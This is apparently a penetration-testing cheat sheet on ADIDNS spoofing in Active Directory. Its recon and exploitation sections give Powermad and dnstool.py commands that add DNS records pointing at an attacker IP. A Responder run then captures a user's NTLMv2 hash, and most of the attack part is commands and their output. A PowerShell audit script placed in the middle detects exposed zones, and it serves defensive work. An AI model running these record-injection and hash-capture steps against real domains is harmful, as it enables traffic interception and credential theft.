ADIDNS Spoofing

Recon

adidnsdump

Powermad

Powermad.ps1: check whether Authenticated Users hold CreateChild on the zone (the permission that lets any domain user add DNS records)

PS > $User = 'domain.local\user';$Pass = ConvertTo-SecureString 'password' -AsPlainText -Force;$Cred = New-Object System.Management.Automation.PSCredential($User, $Pass)

PS > Get-ADIDNSPermission -Credential $Cred -Verbose | ? {$_.Principal -eq 'NT AUTHORITY\Authenticated Users'}
Principal             : NT AUTHORITY\Authenticated Users
IdentityReference     : S-1-5-11
ActiveDirectoryRights : CreateChild
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
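A defender-side audit of the same zone condition, as an added PowerShell example that is not part of Powermad or this page: it reports zones where Authenticated Users or Everyone can create child nodes, whether a wildcard node already exists, and recently created nodes worth reviewing. It assumes the RSAT ActiveDirectory module on a domain-joined host and zones replicated to the DomainDnsZones partition; the function name Get-AdidnsZoneExposure is my own.

```powershell
# Added audit script, not part of Powermad or this page. Assumes the RSAT
# ActiveDirectory module on a domain-joined host and zones replicated to the
# DomainDnsZones partition (a standard partition name; the domain DN itself
# is read at runtime). Function name is an assumption.
Import-Module ActiveDirectory

function Get-AdidnsZoneExposure {
    param([int]$RecentDays = 7)

    $DomainDn = (Get-ADDomain).DistinguishedName
    $Zones = Get-ADObject -SearchBase "DC=DomainDnsZones,$DomainDn" `
        -LDAPFilter '(objectClass=dnsZone)' -Properties nTSecurityDescriptor

    foreach ($Zone in $Zones) {
        # ACEs granting CreateChild (or GenericAll, which includes it) to
        # Authenticated Users (S-1-5-11) or Everyone (S-1-1-0): the condition
        # Get-ADIDNSPermission reports above, i.e. any domain user can add nodes.
        $Open = $Zone.nTSecurityDescriptor.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.ActiveDirectoryRights -match 'CreateChild|GenericAll' -and
            $_.IdentityReference.Value -in @('NT AUTHORITY\Authenticated Users',
                                             'Everyone', 'S-1-5-11', 'S-1-1-0')
        }

        # An existing "*" node blocks the wildcard variant of the attack, since
        # CreateChild alone cannot replace or modify a node that already exists.
        # "\2a" is the LDAP filter escape for a literal asterisk.
        $Wildcard = Get-ADObject -SearchBase $Zone.DistinguishedName -SearchScope OneLevel `
            -LDAPFilter '(&(objectClass=dnsNode)(name=\2a))' -ErrorAction SilentlyContinue

        # Nodes created recently: additions made through LDAP (as in the
        # exploitation section) appear here, so review any name that does not
        # match a known host or the usual dynamic-update pattern.
        $Recent = Get-ADObject -SearchBase $Zone.DistinguishedName -SearchScope OneLevel `
            -LDAPFilter '(objectClass=dnsNode)' -Properties whenCreated |
            Where-Object { $_.whenCreated -gt (Get-Date).AddDays(-$RecentDays) }

        [pscustomobject]@{
            Zone            = $Zone.Name
            OpenCreateChild = (@($Open | ForEach-Object { $_.IdentityReference.Value }) -join ', ')
            WildcardPresent = [bool]$Wildcard
            RecentNodes     = (@($Recent | ForEach-Object { $_.Name }) -join ', ')
        }
    }
}

Get-AdidnsZoneExposure | Format-Table -AutoSize
```

Run it on a domain controller or any host with RSAT; a zone listed with a non-empty OpenCreateChild column and WildcardPresent False is exposed to both the targeted-record and wildcard variants described on this page.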

Exploitation

dnstool.py

$ python3 dnstool.py -u domain.local\\username -p password --action add --record recordname --data ATTACK_IP --type A domain.local
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

# dnstool.py -u 'domain.htb\florence.ramirez' -k -r 'bitbucket.domain.htb' -d 'ATTACKER_IP' -a add -dns-ip DC_IP dc01.domain.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

# Responder.py -I tun0
<-SNIP->
[HTTP] NTLMv2 Client   : 10.10.11.24
[HTTP] NTLMv2 Username : domain\justin.bradley
[HTTP] NTLMv2 Hash     : justin.bradley::domain:1122334455667788:EE9<-SNIP->000000000